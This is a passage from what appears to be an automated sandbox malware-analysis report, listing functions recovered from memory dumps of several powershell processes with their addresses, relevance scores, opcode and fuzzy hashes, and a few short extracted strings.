                                                                • Opcode Fuzzy Hash: 89e69226a11e628b629792c410fab283fb35893eae7f4e3492a4bb5752e59bcc
                                                                • Instruction Fuzzy Hash: 4341157180DBC54FE39A9B3898559523FF0FF52360F1505EFE088CB1A7DA25A84AC792
                                                                Function 00007FF848F3A62C Relevance: .1, Instructions: 97COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8599907626d605771457137bce3d04b3fce24dfcede4b0baf985d37e2a97042a
                                                                • Instruction ID: 1c56cf489d51ccd959d2894707ab2aacd2523ae61bb2cf2a720cf355b10effbd
                                                                • Opcode Fuzzy Hash: 8599907626d605771457137bce3d04b3fce24dfcede4b0baf985d37e2a97042a
                                                                • Instruction Fuzzy Hash: 5021277080DB884FEB09DB68984AAF97FA4EB53321F04415BD445D71A3DA785846CB61
                                                                Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                Function 00007FF849004400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e458824ac2bb0afaf3a1a84c0fca4d51d8c237dea1c7e916535f5bdb9794e1cd
                                                                • Instruction ID: 460117e5c1134c8b2fb8edf5c6c1c0c375303ea5f9655101926c4f1acf4e3ba5
                                                                • Opcode Fuzzy Hash: e458824ac2bb0afaf3a1a84c0fca4d51d8c237dea1c7e916535f5bdb9794e1cd
                                                                • Instruction Fuzzy Hash: 59F0B832A0C5848FDB68EE0CE4458A8B3E0FF04321B0500FAE149CB0A3EB26EC548764

                                                                Non-executed Functions

                                                                Function 00007FF848F38BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: L_^4$L_^7$L_^F$L_^J
                                                                • API String ID: 0-3225005683
                                                                • Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                • Instruction ID: 0907d21456b919f780f717bd5e1c1cb1acc8cc2b6eeb632774ad829765d359f1
                                                                • Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
                                                                • Instruction Fuzzy Hash: A52126B761A025AED3417BBDB8045EE3750DF942B8B4552B3D2988F043EB1C70868AE4

                                                                Executed Functions

                                                                Function 00007FF848FE6605 Relevance: 6.7, Strings: 5, Instructions: 432COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2240736095.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B#I$(B#I$(B#I$(B#I$(B#I
                                                                • API String ID: 0-1620291718
                                                                • Opcode ID: cf7752ca5246e8f3c90375b625701aba2beb26a786f11bc60ff5280aacb8f0f0
                                                                • Instruction ID: 1f8428f6f7b2e3a179d9c4d53f1cef5e309e35d8bf5d367fe979c13d67e138a9
                                                                • Opcode Fuzzy Hash: cf7752ca5246e8f3c90375b625701aba2beb26a786f11bc60ff5280aacb8f0f0
                                                                • Instruction Fuzzy Hash: 92D14231D1EA8E5FEB99AB2858555B5BBA0EF16390F1801FAD40DCB0D3EB1CAC05C356
                                                                Function 00007FF848F19780 Relevance: .1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2239879082.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b8b54987fb7b11e5d49cb5aacd90af27170d2e9c24945a1f808c6009108d34ee
                                                                • Instruction ID: 7b31888d0b4ab455a6d5ab12cce15bb0385185ce819027ad738e223f1db81044
                                                                • Opcode Fuzzy Hash: b8b54987fb7b11e5d49cb5aacd90af27170d2e9c24945a1f808c6009108d34ee
                                                                • Instruction Fuzzy Hash: B531083191CB888FDB18DF1C9C066A97BF0FB99310F00426FE449D3692CA74A856CBC2
                                                                Function 00007FF848DFEB80 Relevance: .1, Instructions: 124COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2239117690.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848dfd000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c2895fbd47533e9e63d9ea383d283974bcf994fc278628cd371e9d85e06fcd95
                                                                • Instruction ID: 1cd0508172aa6d258e04b29ad0e578ced0e2ce329648ed1a298c1d8067b59849
                                                                • Opcode Fuzzy Hash: c2895fbd47533e9e63d9ea383d283974bcf994fc278628cd371e9d85e06fcd95
                                                                • Instruction Fuzzy Hash: A041273180EBC44FE7569B289845A623FF0EF52364F1506EFD089CF1A7D725A84AC792
                                                                Function 00007FF848F1A49C Relevance: .1, Instructions: 99COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2239879082.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 991636a9c41e48a1454ce41a50b40da4bb21fc27f93daa074137983686673252
                                                                • Instruction ID: ab8d66db6699f63aa2615e66b860a0cf5c2d6de11651191b21f34d6940f3f1ba
                                                                • Opcode Fuzzy Hash: 991636a9c41e48a1454ce41a50b40da4bb21fc27f93daa074137983686673252
                                                                • Instruction Fuzzy Hash: 1821F83190CB8C4FDB59DBAC984A7E97FF0EB96321F04426FD049C3192D674A85ACB91
                                                                Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2239879082.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                Function 00007FF848F1A0FB Relevance: .0, Instructions: 41COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2239879082.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5056a6618ad54f93728afe531b56a894a05bd32ec1fcae725f6f5d7776da77d1
                                                                • Instruction ID: 43f86cbbad0bcefa997776f95890cf8d569e72a605e799b11beec97b8a6b1842
                                                                • Opcode Fuzzy Hash: 5056a6618ad54f93728afe531b56a894a05bd32ec1fcae725f6f5d7776da77d1
                                                                • Instruction Fuzzy Hash: 05F0F63A90CA884FDB86EF3C98690D4BF90FF65341B0401ABE508C71A2DB218C48CBC1
                                                                Function 00007FF848FE414D Relevance: .0, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2240736095.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 62954256b4cdda4b3551d97216ca72fee6b3091f8ea6e9260ec13ac2d32fc0aa
                                                                • Instruction ID: 76e8a895964d220e47bd62aa6687434320f6845c34b8b98531d814f8be2c39de
                                                                • Opcode Fuzzy Hash: 62954256b4cdda4b3551d97216ca72fee6b3091f8ea6e9260ec13ac2d32fc0aa
                                                                • Instruction Fuzzy Hash: D2F0BE32A0C9058FDB59EB0CE4058E8B3E0FF68361F1500BAE01DC71A3DB2AEC418799
                                                                Function 00007FF848FE4400 Relevance: .0, Instructions: 35COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2240736095.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 95daf26b3e57229812fa530e816d4d83de664b56ea1f182fdf8786e17b855645
                                                                • Instruction ID: 02f8b2221a112dfabe653fb1a30f699e480a74682e78327b9f6cac369f561aac
                                                                • Opcode Fuzzy Hash: 95daf26b3e57229812fa530e816d4d83de664b56ea1f182fdf8786e17b855645
                                                                • Instruction Fuzzy Hash: BBF0B832A0C9448FD758EB0CE4458A8B3E0FF04321F0500BAE009CB4A3DB2AAC608765
                                                                Function 00007FF848FE41D1 Relevance: .0, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2240736095.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848fe0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction ID: bd13b7360621c8f1dc224687372ce8c208df969c6eec68ee8d726599daf62f98
                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                • Instruction Fuzzy Hash: B3E01A31B0C8088FDB69EB0CE0409B973E1FBA8361B1101BBD14EC75A1CB2AEC518B84

                                                                Non-executed Functions

                                                                Function 00007FF848F18BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2239879082.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_7ff848f10000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                                                • API String ID: 0-2388461625
                                                                • Opcode ID: d7d973928b6bc490940cc819a5da9652819e46ae40904623fe4cd32eeebfa919
                                                                • Instruction ID: 198e3087ebbfc7504edfa98630f772db252869f6143ea1114750b6929877bbe0
                                                                • Opcode Fuzzy Hash: d7d973928b6bc490940cc819a5da9652819e46ae40904623fe4cd32eeebfa919
                                                                • Instruction Fuzzy Hash: D0212973A1A5119AC30137BCBC515D97B91EF543B874502F3E218CF113DE1C648B8796

                                                                Executed Functions

                                                                Function 00007FF849016605 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2379769537.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B&I$(B&I$(B&I$(B&I$(B&I
                                                                • API String ID: 0-1750599480
                                                                • Opcode ID: 7674a8ab95c6db07405a84fa6c6f9b628712c7d2f19d8a3343f4eeaf5cd90d54
                                                                • Instruction ID: 8db0ce94ac479a72cce1c97ef9dfb0812a938cccc0dfaf5a286bd05b3850f6ad
                                                                • Opcode Fuzzy Hash: 7674a8ab95c6db07405a84fa6c6f9b628712c7d2f19d8a3343f4eeaf5cd90d54
                                                                • Instruction Fuzzy Hash: 3DD14332D0EACA9FEB65AB2858565B5BBE0FF16794B0801FBD04CC7093EA19DC45C351
                                                                Function 00007FF849014073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2379769537.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>&I
                                                                • API String ID: 0-4142972376
                                                                • Opcode ID: 8ea8ba7c667f98aa395ad45770c69bbba13597796b7ee8cbc54c0b7da01663e0
                                                                • Instruction ID: 61a13c5bd5a51afc33ecaa0622eb5ff17adddf63c80c6162a92cef6ea412eade
                                                                • Opcode Fuzzy Hash: 8ea8ba7c667f98aa395ad45770c69bbba13597796b7ee8cbc54c0b7da01663e0
                                                                • Instruction Fuzzy Hash: 90510A32E0DA868FEBA9EE1C54526B577E1EF54360F1905BAC00EC71A3EE29EC158351
                                                                Function 00007FF849014370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2379769537.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p>&I
                                                                • API String ID: 0-2823867658
                                                                • Opcode ID: 665fd4a13056bdfc54d480df86ddbe0b07eebf1cdfda7a331d68a4b9a335bcfe
                                                                • Instruction ID: 7552fdf10549e156edaea9b0f6e31c77c56272236fc9e678f0845371f86a9dfe
                                                                • Opcode Fuzzy Hash: 665fd4a13056bdfc54d480df86ddbe0b07eebf1cdfda7a331d68a4b9a335bcfe
                                                                • Instruction Fuzzy Hash: B2412C32E0DA858FEBB5EE2C64526B477E1EF45760F0801BAC04DC71A3FA19EC158395
                                                                Function 00007FF8490140BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2379769537.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>&I
                                                                • API String ID: 0-4142972376
                                                                • Opcode ID: d32d5f58c167a3c7ffd4f4acc667a71b367409a6d58e9b139f8f3481c9e6388d
                                                                • Instruction ID: 1f02258c8609f8a8983e7b4d6e147209e00caedf923b3e00d6e32f1f0eccd019
                                                                • Opcode Fuzzy Hash: d32d5f58c167a3c7ffd4f4acc667a71b367409a6d58e9b139f8f3481c9e6388d
                                                                • Instruction Fuzzy Hash: BC21D232D0DAC78FEBB9EE1C545257476D1EF64390B5905B9C01EC71B2EE2AEC148641
                                                                Function 00007FF8490143BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2379769537.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p>&I
                                                                • API String ID: 0-2823867658
                                                                • Opcode ID: a86b3f3af306cd184eadd257773c4da426c88f78e0e2424330b730c46486dc7c
                                                                • Instruction ID: 2a5a06905c6097c6faaab90acdc61fbb6f8ebc2f67e0f3e0e9b727ce7d511b92
                                                                • Opcode Fuzzy Hash: a86b3f3af306cd184eadd257773c4da426c88f78e0e2424330b730c46486dc7c
                                                                • Instruction Fuzzy Hash: 5A11E532D0E9868FEBB5EF28A4525B477E1FF44360B4900B6D15DC71B6EA1AEC148351
                                                                Function 00007FF848F4B728 Relevance: .3, Instructions: 267COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5523763130921b3438fe43ff2275c830dc405b1684e51f35dfc0f5df09fa534e
                                                                • Instruction ID: 074a0547f7c343fb54b06b9f6f960aea55fb4eebaad6efca4f73868dc5fe7a4b
                                                                • Opcode Fuzzy Hash: 5523763130921b3438fe43ff2275c830dc405b1684e51f35dfc0f5df09fa534e
                                                                • Instruction Fuzzy Hash: 17714A3091CA484FD748EF6CC885AB5BBE0EFA5361F1401BED08AC7197DB25E846CB51
                                                                Function 00007FF848F49EF2 Relevance: .2, Instructions: 249COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d5245e42254b62a30662c65d98b66466a4a027b8ccb88bbbae2a9ec885321de4
                                                                • Instruction ID: fc5a88f8184238e973db03b2f221bbb1ddc3535e2fbdfa75f65552cb05dfe8af
                                                                • Opcode Fuzzy Hash: d5245e42254b62a30662c65d98b66466a4a027b8ccb88bbbae2a9ec885321de4
                                                                • Instruction Fuzzy Hash: 2C7128B7D0D9868FE706EB2CA8950E57760FF3176DF0802BBC4888A0D3FE1959568785
                                                                Function 00007FF848F49FD3 Relevance: .2, Instructions: 154COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed74d657a34f2f3da55beb4c319f2c18660409710ac88e55d98d5cc6f1fc5a0c
                                                                • Instruction ID: b3cd212467bfd98c3c26a95fee37bc1d2478b0bd80fcdb0e18750eaf77e82d59
                                                                • Opcode Fuzzy Hash: ed74d657a34f2f3da55beb4c319f2c18660409710ac88e55d98d5cc6f1fc5a0c
                                                                • Instruction Fuzzy Hash: 4E41B7B7D0E9C64FE716AB2CA8950D57B60FF31B99F1801BBC0489A0D3FB1A18968745
                                                                Function 00007FF848E2ED40 Relevance: .1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378012151.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848e2d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ab30c257001ef1bb94cd481a3c03bab8c7b747294c088271758ca73ef7b32dd7
                                                                • Instruction ID: 4187e48e5f330bc86c2e5be773bfd841b4f3890d83cb2c935a33417fc71c627d
                                                                • Opcode Fuzzy Hash: ab30c257001ef1bb94cd481a3c03bab8c7b747294c088271758ca73ef7b32dd7
                                                                • Instruction Fuzzy Hash: 4641D13080DBC44FE7569B3998559523FF0FF57260B1906DFD088CB1A3D629A84AC7A2
                                                                Function 00007FF848F49768 Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5bca3c22a2373263e493cec4a487d1827cd682f4c9b75fad49d0b2985e1e15e3
                                                                • Instruction ID: eb95af9bc25244a9588cf5d2eaf3d80ebce9f7509422fa425ec5445c09f9fed4
                                                                • Opcode Fuzzy Hash: 5bca3c22a2373263e493cec4a487d1827cd682f4c9b75fad49d0b2985e1e15e3
                                                                • Instruction Fuzzy Hash: 8631E931A1CA489FDB58DF5CA8066B97BE0FBA5711F10422FE44993251DB30A855CBC2
                                                                Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45

                                                                Non-executed Functions

                                                                Function 00007FF848F48995 Relevance: 5.1, Strings: 4, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: K_^$K_^$K_^$K_^
                                                                • API String ID: 0-4267328068
                                                                • Opcode ID: 4564ffd27c1decdb30e70a069f1052051ef1d917aad64ca8fbfa5b9948e2cd89
                                                                • Instruction ID: ea6f6f173c92a9113898f554b284dec086536233255657a327720ffddb8194eb
                                                                • Opcode Fuzzy Hash: 4564ffd27c1decdb30e70a069f1052051ef1d917aad64ca8fbfa5b9948e2cd89
                                                                • Instruction Fuzzy Hash: 8141B172D1EAC26FE746972858650D57FA0EF22A58F0D01FBC0C89F0D3EA9D540B935A
                                                                Function 00007FF848F48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.2378926160.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: K_^4$K_^7$K_^F$K_^J
                                                                • API String ID: 0-377281160
                                                                • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                • Instruction ID: bead706383397ff6f8c4a37cb53810d507c8abccd64b99c06fffeb200d3c1acc
                                                                • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
                                                                • Instruction Fuzzy Hash: 11213B7761A525AED7417B7CB8045DA3BA0DF982B8B4503B3D198CF053EA1C708786D4

                                                                Executed Functions

                                                                Function 00007FF848FD6605 Relevance: 6.7, Strings: 5, Instructions: 436COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2586317329.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff848fd0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B!I$(B!I$(B!I$(B!I$(B!I
                                                                • API String ID: 0-3547137269
                                                                • Opcode ID: 00dfd1b53212bd36073e6f896ce5e77c86c4e49028b9b6228db41c07eaf4108b
                                                                • Instruction ID: 7908b5618bed8c030cec3c94e1cb7b1c9c9ee3c6da498479a35f144231cf8a78
                                                                • Opcode Fuzzy Hash: 00dfd1b53212bd36073e6f896ce5e77c86c4e49028b9b6228db41c07eaf4108b
                                                                • Instruction Fuzzy Hash: 74D12331D0EACA5FEB95AB2858155B5BBE0EF16390F1801FAD14ECB0D3EB1CA805C795
                                                                Function 00007FF848FD4073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2586317329.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff848fd0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>!I
                                                                • API String ID: 0-3115395871
                                                                • Opcode ID: f694b00a9b27088eff96e7632fe37f46025b2139bb440d07f713c5bf028ae104
                                                                • Instruction ID: 086ccb14ff529e1dfbb6b2d17b640069047e4ef08f15b4214513022d5d41a2ca
                                                                • Opcode Fuzzy Hash: f694b00a9b27088eff96e7632fe37f46025b2139bb440d07f713c5bf028ae104
                                                                • Instruction Fuzzy Hash: F251E632A0DA864FEB9AEB2C541167577E2FF65260F1801BAC24EC71D3DF18E8058B59
                                                                Function 00007FF848FD4370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2586317329.00007FF848FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FD0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_7ff848fd0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: p>!I
                                                                • API String ID: 0-3876674509
                                                                • Opcode ID: 2bf6f687e3ef56b6c2dc6d9d5a9125da855117b9c9f5a700e46c632a633bfebe
                                                                • Instruction ID: 9b8bb1ceb80849b09cef8f57e8c80421cb7617dff96955f3d913fc0aad1e7bbd
